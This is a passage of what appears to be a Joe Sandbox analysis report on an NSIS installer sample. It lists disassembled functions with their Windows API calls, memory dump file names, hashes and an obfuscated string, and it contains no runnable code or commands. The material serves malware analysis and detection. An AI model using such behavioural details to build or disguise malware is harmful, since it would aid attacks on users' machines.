                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ItemMessageSendWindow$ClassDestroyDialogEnableLongMenuShowText
                                                                                                                                                                                                                                  • String ID: NSIS Software Setup
                                                                                                                                                                                                                                  • API String ID: 1257292352-2653429224
                                                                                                                                                                                                                                  • Opcode ID: 292bb44675ccfa867acd3725238b8a77fc34fda148f2e8f9fca479e34ef56d7c
                                                                                                                                                                                                                                  • Instruction ID: 81f075938f45a7985b655ae660e62a259a3a74716ec96c8beebe6fa6edba758e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 292bb44675ccfa867acd3725238b8a77fc34fda148f2e8f9fca479e34ef56d7c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B12EDB0904700EFD720AF69D98876FBBF4EB84714F50893EE88497290D7789885DF5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004057B5 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 246windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Item$Cursor$ButtonCheckColorExecuteShell
                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                  • API String ID: 3348721118-1885708031
                                                                                                                                                                                                                                  • Opcode ID: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
                                                                                                                                                                                                                                  • Instruction ID: 44f7cc544d88e5f9b0c99828474254857af221e4d6201ddb95d9c50adba5cc38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5B1E7B0908704AFD710AF69D58876EBBF0FF44314F40892DE889A7381D779A885CF96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateIndirectRect$BeginBrushClientColorDeleteFillFontModeObjectPaintProcTextWindow
                                                                                                                                                                                                                                  • String ID: NSIS Software Setup
                                                                                                                                                                                                                                  • API String ID: 2207649800-2653429224
                                                                                                                                                                                                                                  • Opcode ID: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                                                                                                                                  • Instruction ID: 8fd51326f023e27f82ac7456779bc240a2534a06902e8bdd8a27472bfc587b1b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 046115B09047089FCB24DFA9C9885AEBBF8FF88310F50892EE499D7251D734A845DF56
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00408311 Relevance: 16.7, APIs: 11, Instructions: 176filememoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                    • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00408822), ref: 00408383
                                                                                                                                                                                                                                  • GetShortPathNameA.KERNEL32 ref: 0040839D
                                                                                                                                                                                                                                    • Part of subcall function 004079B4: lstrlenA.KERNEL32 ref: 004079CC
                                                                                                                                                                                                                                    • Part of subcall function 004079B4: lstrcmpiA.KERNEL32 ref: 004079F4
                                                                                                                                                                                                                                  • GetShortPathNameA.KERNEL32 ref: 004083C8
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004083FF
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32 ref: 0040845A
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32 ref: 00408476
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?), ref: 004084A2
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32 ref: 00408568
                                                                                                                                                                                                                                    • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                    • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 0040858B
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 00408597
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?), ref: 004085A1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Handle$CloseGlobalNamePathShort$AddressAllocAttributesCreateFreeModulePointerProcReadSizeWritelstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1472977481-0
                                                                                                                                                                                                                                  • Opcode ID: 13db83d6b791d1ca6467b22e5dc8b14e389eea567c2d00f0c859e75bf8b65817
                                                                                                                                                                                                                                  • Instruction ID: 94d356f40ec1d5b6b18a4eade4987fc681b306d1f2835a3a3d653d78bc44f301
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13db83d6b791d1ca6467b22e5dc8b14e389eea567c2d00f0c859e75bf8b65817
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70710AB0908305AFD710AF65DA8866FBBF4FF84704F50C82EE9C497251DB789445CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00405C44 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 327COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405CAA
                                                                                                                                                                                                                                  • SetWindowTextA.USER32 ref: 00405CE6
                                                                                                                                                                                                                                    • Part of subcall function 00407805: GetDlgItemTextA.USER32 ref: 00407829
                                                                                                                                                                                                                                    • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                    • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                    • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                    • Part of subcall function 00407D37: CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00405FAC
                                                                                                                                                                                                                                  • MulDiv.KERNEL32 ref: 00405FD2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • A, xrefs: 00405DE1
                                                                                                                                                                                                                                  • 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00405C60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Char$Next$ItemText$DiskFreePrevSpaceWindow
                                                                                                                                                                                                                                  • String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$A
                                                                                                                                                                                                                                  • API String ID: 2917460849-2103090652
                                                                                                                                                                                                                                  • Opcode ID: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                                                                                                                                  • Instruction ID: 826313f772001043a55ea6ee256f7e169a774654cc20dc23f9f2a1aa091d3067
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FD128B09087049FDB10EF69D58466EBBF4FF44304F51893EE888A7281D7789985CF9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407E06 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 236stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?), ref: 00407EE6
                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 00407F25
                                                                                                                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 00407FC6
                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32 ref: 00407FEC
                                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32 ref: 00408018
                                                                                                                                                                                                                                  • SHGetPathFromIDListA.SHELL32 ref: 00408073
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32 ref: 00408084
                                                                                                                                                                                                                                    • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • ., xrefs: 00407F41
                                                                                                                                                                                                                                  • 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 0040809D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrlenwsprintf
                                                                                                                                                                                                                                  • String ID: .$62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
                                                                                                                                                                                                                                  • API String ID: 3880481140-1911195491
                                                                                                                                                                                                                                  • Opcode ID: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                                                                                                                                  • Instruction ID: afc503830e017d1618816f2a7c40fbe451ee37b9332185e2dde12f9a903aaa14
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB918E71D082149FDB20DF69C9846AEBBF4EF48300F55853EE894A7381D738A845CB9B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404F0F Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                                                                  • Opcode ID: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                                                                                                                                  • Instruction ID: 1780d8928a2120b8c11af9b20abdfd96f0510a7958c84a0cc1c987df9bbb4b6c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF3128B09047069BDB10DFA8D988A6BBFE4BF48314F04886DFD94DB251D374D941CB66
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403491 Relevance: 10.6, APIs: 7, Instructions: 132filememoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(74DF05F0), ref: 004034EF
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32 ref: 0040351C
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00403653
                                                                                                                                                                                                                                    • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
                                                                                                                                                                                                                                    • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403561
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 004035D6
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 00403606
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 00403612
                                                                                                                                                                                                                                    • Part of subcall function 00403D52: SetFilePointer.KERNEL32 ref: 00403D89
                                                                                                                                                                                                                                    • Part of subcall function 00403D52: ReadFile.KERNEL32 ref: 00403DD5
                                                                                                                                                                                                                                    • Part of subcall function 00403D52: ReadFile.KERNEL32 ref: 00403E9A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Global$Read$AllocFreePointer$CloseDeleteHandleWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2143033257-0
                                                                                                                                                                                                                                  • Opcode ID: 0aa6d49e2075d0b495ce51cdb1172a2f07b07b4f6215442dff9fb3ed0ec64bc4
                                                                                                                                                                                                                                  • Instruction ID: 4c510bf6e2d4d1f92ab55f121e890243c90c0ce65b69a7146e7506ad40f7442f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0aa6d49e2075d0b495ce51cdb1172a2f07b07b4f6215442dff9fb3ed0ec64bc4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51510BB0A087009FD710EF29C844B6EBBF4AF84315F01896EE598E7391D7389985CF56
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040247C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectwsprintf
                                                                                                                                                                                                                                  • String ID: H$Z
                                                                                                                                                                                                                                  • API String ID: 1586071882-4221459494
                                                                                                                                                                                                                                  • Opcode ID: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
                                                                                                                                                                                                                                  • Instruction ID: fe53f9027c55cc81bf00ecbd586396b11bfc2b5e7faefd45710aa59a0b9b721a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
